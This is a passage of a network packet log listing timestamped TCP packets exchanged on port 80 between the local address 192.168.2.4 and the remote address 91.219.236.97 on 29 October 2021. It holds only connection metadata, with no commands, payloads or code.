Oct 29, 2021 20:50:41.817147970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817163944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817179918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817197084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817212105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817228079 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817229986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.817245007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817260981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817267895 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.817276955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817289114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.817306042 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.817332983 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.834100962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834121943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834137917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834155083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834172964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834180117 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.834188938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834219933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.834331036 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.834377050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849071980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849092960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849107981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849123955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849139929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849145889 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849155903 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849169016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849190950 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849222898 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849383116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849400043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849426985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849427938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849462986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849467993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849522114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849538088 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849549055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.849560976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.849582911 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.875296116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875318050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875330925 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875349045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875365019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875380993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875392914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.875432968 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.875503063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.884459972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.884485006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.884500980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.884516954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.884547949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.884574890 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.885680914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885725021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885740995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885757923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885802031 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.885808945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885822058 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.885835886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885852098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.885854006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885870934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885895014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.885900974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.885962963 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.951987982 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952019930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952040911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952061892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952081919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952095032 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.952104092 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952112913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.952126026 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952147007 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.952151060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952173948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952189922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.952199936 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.952231884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.978770018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978813887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978847980 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978880882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978883028 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.978914022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978939056 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.978946924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978980064 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.978996038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979008913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979041100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979063988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979072094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979108095 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979118109 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979139090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979166985 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979198933 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979199886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979232073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979244947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979259014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979317904 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979363918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979398012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979433060 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979449987 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979461908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979490042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979511976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979521990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979552031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979568958 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979585886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979615927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979629040 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.979638100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.979676008 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:41.984139919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.984189034 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.984217882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.984241009 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:41.984333992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.011826038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011857986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011879921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011900902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011923075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011943102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011964083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.011969090 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.011984110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.012006044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.012022972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.012053967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.012094021 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.017139912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.017180920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.017209053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.017229080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.017278910 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.017321110 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.043991089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044012070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044028044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044039965 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044084072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044101000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044178963 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044178963 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.044218063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044234991 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044244051 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.044251919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.044270992 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.044297934 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.044343948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.048587084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.048610926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.048626900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.048640013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.048664093 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.048710108 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.075918913 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.075963020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.075987101 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076004028 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076021910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076037884 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076064110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076067924 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076081038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076117039 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076164007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076174974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076209068 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076216936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076237917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076258898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076301098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076391935 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076427937 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076442957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.076446056 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.076484919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.080673933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.080698013 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.080713987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.080727100 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.080787897 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.080817938 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.107866049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.107886076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.107920885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.107933998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108028889 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.108087063 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.108407021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108426094 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108438969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108454943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108479023 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.108516932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.108517885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108536005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108586073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.108607054 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.113121986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.113142967 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.113159895 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.113172054 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.113192081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.113284111 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.140355110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140374899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140391111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140403986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140474081 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.140777111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140830040 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140836000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.140866995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140882015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140897989 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140913010 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.140914917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140932083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140943050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.140960932 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.141001940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.145838976 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145869017 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145889997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145914078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145931005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145929098 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.145962000 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.145971060 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.145975113 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.146023989 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.175626040 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175648928 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175668955 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175683022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175699949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175717115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175724030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.175736904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175755024 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175770998 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175771952 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.175785065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175793886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.175843000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.175858974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.179322004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179346085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179358006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179374933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179392099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179408073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179471970 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.179505110 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.179688931 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.179754972 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.257843971 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.257882118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.257904053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.257922888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.258007050 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274306059 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274338961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274363041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274388075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274463892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274493933 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274522066 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274528027 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274576902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274595976 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274601936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274627924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274652004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274693966 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274724960 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274802923 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274828911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274852037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274873972 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274877071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.274918079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.274979115 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275005102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275046110 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275051117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275075912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275115013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275214911 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275240898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275264978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275284052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275290012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275314093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275333881 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275336981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275379896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275424957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275449038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275474072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275490999 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.275494099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.275537014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.278393030 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278433084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278456926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278481007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278506041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278512955 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.278531075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278542995 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.278548002 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:50:42.278577089 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:50:42.289573908 CEST	80	49865	91.219.236.97	192.168.2.4
